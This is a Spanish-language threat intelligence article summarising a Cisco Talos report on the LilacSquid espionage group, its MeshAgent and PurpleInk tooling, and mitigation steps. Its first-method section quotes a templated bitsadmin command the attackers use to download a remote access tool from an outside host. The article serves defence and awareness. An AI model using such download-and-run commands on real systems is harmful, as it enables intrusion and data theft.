Un nuevo informe de Cisco Talos expuso las actividades de un actor de amenazas conocido como LilacSquid, o UAT-4820. El actor de amenazas explota aplicaciones web vulnerables o utiliza credenciales comprometidas de Protección de Escritorio Remoto para comprometer exitosamente sistemas infectándolos con el malware personalizado PurpleInk. Hasta ahora, organizaciones en varios sectores en los EE. UU., Europa y Asia han sido impactadas con el propósito de robo de datos, aunque es posible que más sectores hayan sido impactados pero aún no se hayan identificado.
¿Quién es LilacSquid?
LilacSquid es un actor de amenazas de ciberespionaje que ha estado activo desde al menos 2021. También se le conoce como UAT-4820.
Algunas de las industrias que LilacSquid ha atacado hasta ahora incluyen:
Organizaciones de TI que construyen software para los sectores de investigación e industrial en los EE. UU.
Organizaciones en el sector energético en Europa.
Organizaciones en el sector farmacéutico en Asia.
Primer método: Explotación de aplicaciones web vulnerables
El primer método utilizado por LilacSquid para comprometer sus objetivos consiste en explotar con éxito aplicaciones web vulnerables.
Una vez que se realiza la explotación, el actor de amenazas despliega scripts para configurar carpetas de trabajo para el malware, luego descarga y ejecuta MeshAgent, una herramienta de gestión remota de código abierto. La descarga se realiza típicamente a través de la herramienta legítima bitsadmin del sistema operativo Microsoft Windows:
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent- -local_path_for_MeshAgent- connect
MeshAgent utiliza un archivo de configuración de texto conocido como archivo MSH, que contiene un identificador de la víctima y la dirección del Centro de Control.
La herramienta permite a su operador enumerar todos los dispositivos de su objetivo, ver y controlar el escritorio, administrar archivos en el sistema controlado o recopilar información de software y hardware del dispositivo.
Una vez instalado y en funcionamiento, MeshAgent se utiliza para activar otras herramientas como Secure Socket Funneling, una herramienta de código abierto para el enrutamiento de comunicaciones, y los implantes de malware InkLoader / PurpleInk.
LilacSquid – Acceso inicial. Imagen: Cisco Talos
Segundo método: Uso de credenciales RDP comprometidas
Un segundo método utilizado por LilacSquid para acceder a objetivos consiste en utilizar credenciales RDP comprometidas. Cuando se utiliza este método, LilacSquid opta por desplegar MeshAgent y continuar con el ataque o introducir InkLoader, un cargador de malware simple pero efectivo.
InkLoader ejecuta otro payload: PurpleInk. Hasta ahora, solo se ha observado que el cargador ejecuta PurpleInk, pero podría utilizarse para desplegar otros implantes de malware.
LilacSquid – Acceso inicial. Imagen: Cisco Talos
Otro cargador utilizado por LilacSquid es InkBox, que lee y descifra contenido de una ruta de archivo codificada de forma permanente en la unidad. El contenido descifrado se ejecuta invocando su Punto de Entrada dentro del proceso InkBox en ejecución en la computadora. Este contenido descifrado es el malware PurpleInk.
Variante de activación de PurpleInk. Imagen: Cisco Talos
¿Qué es el malware PurpleInk?
El principal implante utilizado por el actor de amenazas LilacSquid, PurpleInk, se basa en QuasarRAT, una herramienta de acceso remoto disponible en línea desde al menos 2014. PurpleInk ha sido desarrollado a partir de la base de QuasarRAT en 2021 y continúa actualizándose. Está fuertemente obfuscado, en un intento de dificultar su detección.
El malware utiliza un archivo de configuración en base64 que contiene la dirección IP y el número de puerto del servidor C2.
PurpleInk es capaz de recopilar información básica como información de unidades (por ejemplo, etiquetas de volumen, nombres de directorios raíz, tipo de unidad y formato), información de procesos en ejecución o información del sistema (por ejemplo, tamaño de memoria, nombre de usuario, nombre de computadora, direcciones IP, tiempo de actividad de la computadora). El malware también es capaz de enumerar carpetas, nombres de archivos y tamaños, y reemplazar o agregar contenido a archivos. Y, PurpleInk es capaz de iniciar un shell remoto y enviar/recibir datos desde una dirección remota especificada, generalmente un servidor proxy.
¿Cómo mitigar este riesgo de ciberseguridad de LilacSquid?
Para proteger a su organización contra las operaciones de compromiso inicial ejecutadas por LilacSquid, es necesario:
Mantener todas las aplicaciones web orientadas a Internet actualizadas y parcheadas. Además, todos los hardware, sistemas operativos y software deben estar actualizados y parcheados para evitar ser comprometidos por otras vulnerabilidades comunes.
Aplicar políticas estrictas a las conexiones RDP de los empleados y desplegar autenticación multifactor cuando sea posible para evitar que un atacante pueda iniciar sesión en la red corporativa a través de RDP.
Buscar archivos de configuración de MeshAgent en sistemas, especialmente si la herramienta no se usa internamente.
Analizar cuidadosamente cualquier uso de la herramienta bitsadmin para descargar o ejecutar código.
Monitorear las comunicaciones de red en busca de conexiones en puertos exóticos o comunicaciones que van directamente a direcciones IP externas en lugar de dominios.
Desplegar soluciones de detección en los puntos finales: detección y respuesta en puntos finales o detección y respuesta extendida, para detectar actividades sospechosas.
Elevar la conciencia de los empleados sobre las amenazas cibernéticas, particularmente cómo detectar y reportar intentos de phishing.
Divulgación: Trabajo para Trend Micro, pero las opiniones expresadas en este artículo son mías.